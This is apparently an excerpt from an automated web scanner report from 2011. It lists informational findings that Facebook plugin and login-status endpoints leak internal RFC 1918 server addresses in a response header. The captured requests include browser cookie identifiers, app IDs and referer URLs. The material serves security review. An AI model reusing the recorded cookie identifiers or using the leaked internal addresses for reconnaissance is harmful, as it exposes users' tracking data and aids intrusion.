GET /extern/login_status.php?api_key=109674171476&app_id=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34ba3dbc62b10e%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d85c573d0a02a%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ee394c5af22f2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e5d79b22ab4fe%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ee394c5af22f2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df332290962aeaa4%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ee394c5af22f2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a3ae83454ea18%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ee394c5af22f2&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.218.54
X-Cnection: close
Date: Thu, 21 Jul 2011 18:43:33 GMT
Content-Length: 273

<script type="text/javascript">
parent.postMessage("cb=f332290962aeaa4&origin=http\u00253A\u00252F\u00252Fgames.myyearbook.com\u00252Ff29bf246f2c989e&relation=parent&transport=postmessage&frame=f1ee39
...[SNIP]...

23.112. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.208.40

Request

GET /extern/login_status.php?api_key=43ba894bddb4e01b3ecd4ed15755e192&app_id=43ba894bddb4e01b3ecd4ed15755e192&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b4daca18%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d4de4d9%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df239c4defc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e08a0ac%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df239c4defc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df332b0d358%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df239c4defc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ed2da924%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df239c4defc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.208.40
X-Cnection: close
Date: Sat, 23 Jul 2011 13:19:31 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=f332b0d358&origin=http\u00253A\u00252F\u00252Fwww.treehugger.com\u00252Ff135c372b4&relation=parent&transport=postmessage&frame=f239c4defc", "http
...[SNIP]...

23.113. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.124.42

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1523c42caea7c8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1f6d227f047736%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d172071144baa%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1f6d227f047736%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c49ae5e2b5e5a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273388492609f8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1f6d227f047736%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c49ae5e2b5e5a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df213d45c41f002e%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1f6d227f047736%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c49ae5e2b5e5a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8c1ad4ce2fdd8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1f6d227f047736%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c49ae5e2b5e5a&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.42
X-Cnection: close
Date: Sat, 23 Jul 2011 04:31:58 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f213d45c41f002e&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1f6d227f047736&relation=parent&transport=postmessage&frame=f1c49ae5e2b5
...[SNIP]...

23.114. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.76.37

Request

Response

23.115. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.111.49

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_998904%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_998904&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_998904&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.111.49
X-Cnection: close
Date: Sat, 23 Jul 2011 02:08:46 GMT
Content-Length: 0

23.116. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.215.60

Request

GET /extern/login_status.php?api_key=216232338409059&app_id=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2723a50e091194%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d178d4b72688%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b78eb45666ac4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7c18ba5f6ed3a%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b78eb45666ac4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df303952cc51c568%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b78eb45666ac4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffa327f2a7b37a%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b78eb45666ac4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.215.60
X-Cnection: close
Date: Sat, 23 Jul 2011 03:47:48 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f303952cc51c568&origin=http\u00253A\u00252F\u00252Fwww.hitcon.org\u00252Ff3d074be8c359d&relation=parent&transport=postmessage&frame=f2b78eb45666a
...[SNIP]...

23.117. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.48.62

Request

Response

23.118. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.172.33

Request

Response

23.119. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.212.81

Request

Response

23.120. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.59

Request

Response

23.121. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.221.51

Request

Response

23.122. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.51.41

Request

Response

23.123. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.49.31

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

23.124. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.209.67

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.125. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.107.21

Request

Response

23.126. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.208.63

Request

Response

23.127. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.224.37

Request

Response

23.128. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.48

Request

Response

23.129. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.214.31

Request

Response

23.130. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.217.49

Request

Response

23.131. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.237.37

Request

Response

23.132. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.146.47

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.133. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.29.35

Request

Response

23.134. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.31.51

Request

Response

23.135. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.61

Request

Response

23.136. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.164.58

Request

Response

23.137. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.47.56

Request

Response

23.138. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.166.62

Request

Response

23.139. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.33

Request

Response

23.140. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.55.36

Request

Response

23.141. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.35.59

Request

Response

23.142. http://www.facebook.com/plugins/fan.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.32.60

Request

Response

23.143. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.66.43

Request

GET /plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c9242aec2fa64%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.144. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.41

Request

GET /plugins/like.php?href=%2Fcampaigns%2Fwhales%2Fwhale-wars%23gallery&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.145. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.173.48

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.seashepherd.org&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.146. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.201.43

Request

GET /plugins/like.php?href=www.facebook.com%2Fseashepherdconservationsociety&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.147. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.251.58

Request

GET /plugins/like.php?action=like&api_key=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7eb1714491d5c%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff29bf246f2c989e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.myyearbook.com%2F&layout=button_count&locale=en_US&node_type=link&ref=facebookLike_Link_HBL&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.148. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.213.58

Request

GET /plugins/like.php?href=www.facebook.com%2Fseashepherdconservationsociety&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.149. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.114.63

Request

GET /plugins/like.php?href=http://www.facebook.com/boston&layout=standard&show_faces=false&width=289&action=like&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
